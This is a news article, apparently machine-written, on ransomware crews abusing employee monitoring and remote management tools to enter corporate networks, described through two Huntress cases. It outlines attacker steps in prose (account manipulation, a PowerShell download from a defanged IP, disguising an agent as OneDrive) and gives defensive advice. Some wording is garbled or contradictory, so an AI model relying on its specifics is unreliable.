Ethical Hacking News
Threat actors are using legitimate employee monitoring tools to gain access to corporate networks and deploy ransomware payloads, highlighting the importance of proactive cybersecurity measures to protect against these evolving threats. By leveraging software used for monitoring employees' activities, attackers can easily hide within enterprise IT environments and go unnoticed until it's too late. This incident serves as a stark reminder that vigilance is key in preventing such devastating cyber attacks.
Ransomware attackers are using legitimate employee monitoring software to gain access to corporate networks. The attackers use software like Net Monitor for Employees Professional and SimpleHelp RMM to deploy malicious payloads. It's challenging for security teams to distinguish between benign and malicious activity due to the blending of these tools with legitimate signed binaries. Attackers used the same software companies use to monitor employee activity against them, making it harder to detect attacks. Companies should turn on multi-factor authentication, limit remote access, and conduct regular audits of third-party RMM tools to prevent such incidents.
In a shocking turn of events, cybersecurity experts have discovered that ransomware crews are leveraging legitimate employee monitoring software to gain access to corporate networks and deploy malicious payloads. The Huntress response team has identified two recent cases where attackers used the Net Monitor for Employees Professional tool in tandem with the SimpleHelp RMM (remote monitoring and management) software to launch a devastating cyber attack on unsuspecting victims.
According to Michael Tigges, senior security operations analyst at Huntress, "RMMs and employee monitoring tools blend in amongst legitimate signed binaries," making it challenging for security teams to distinguish between benign and malicious activity. This phenomenon is particularly concerning, as attackers can utilize the same software that companies use to monitor employee activity against them.
The first incident observed by Huntress took place in late January, where an attacker managed to install Net Monitor for Employees Professional on a victim's machine without gaining initial access. The intruder then manipulated user accounts via multiple net commands, including attempting to identify valid usernames, reset passwords, and create new admin-user accounts on the host.
The attackers used PowerShell to pull down a file named vhost.exe from the IP address of 160.191.182[.]41, which turned out to be the SimpleHelp executable. The intruder then attempted to deploy multiple versions of Crazy ransomware linked to VoidCrypt, ultimately failing to succeed in deploying the malware.
The second incident, which occurred in early February, involved a compromised third-party SSL VPN account that provided the attacker with initial access to the victim's computer. They connected to a domain controller using remote desktop protocol and launched a PowerShell session before installing the Net Monitor agent and configuring it to call back to an attacker-controlled console.
The attackers cleverly disguised the agent as Microsoft OneDrive by registering the service as OneDriveSvc, naming the process OneDriver.exe, and renaming the running binary to svchost.exe. They then used SimpleHelp to monitor for keywords related to cryptocurrency wallets, exchanges, blockchain explorers, and payment platforms, indicating a financial motivation that extends beyond ransomware.
The use of shared infrastructure in both cases, as well as overlapping IP addresses and reused filenames (vhost.exe), "strongly suggest" a single attacker or group behind the two intrusions. Huntress warns that employees should turn on multi-factor authentication on all remote access services and external-facing applications and limit remote access to only those users and systems that require it to do their jobs.
Conducting regular audits of third-party RMM tools and employee monitoring software is also recommended by the security analysts, as well as monitoring for any unusual process execution chains. This highlights the importance of vigilance in the face of ever-evolving cyber threats and underscores the need for proactive cybersecurity measures to protect against such attacks.
In conclusion, this recent revelation underscores the cunning nature of ransomware crews who are continually seeking new methods to infiltrate corporate networks. By leveraging legitimate employee monitoring software, they have managed to blend into these environments undetected until now. It is crucial that companies take immediate action to review and update their cybersecurity protocols to prevent such incidents in the future.
Related Information:
https://www.ethicalhackingnews.com/articles/Ransomware-Crews-Latest-Tool-Repurposed-Employee-Monitoring-Software-ehn.shtml
Published: Tue Feb 17 23:46:52 2026 by llama3.2 3B Q4_K_M
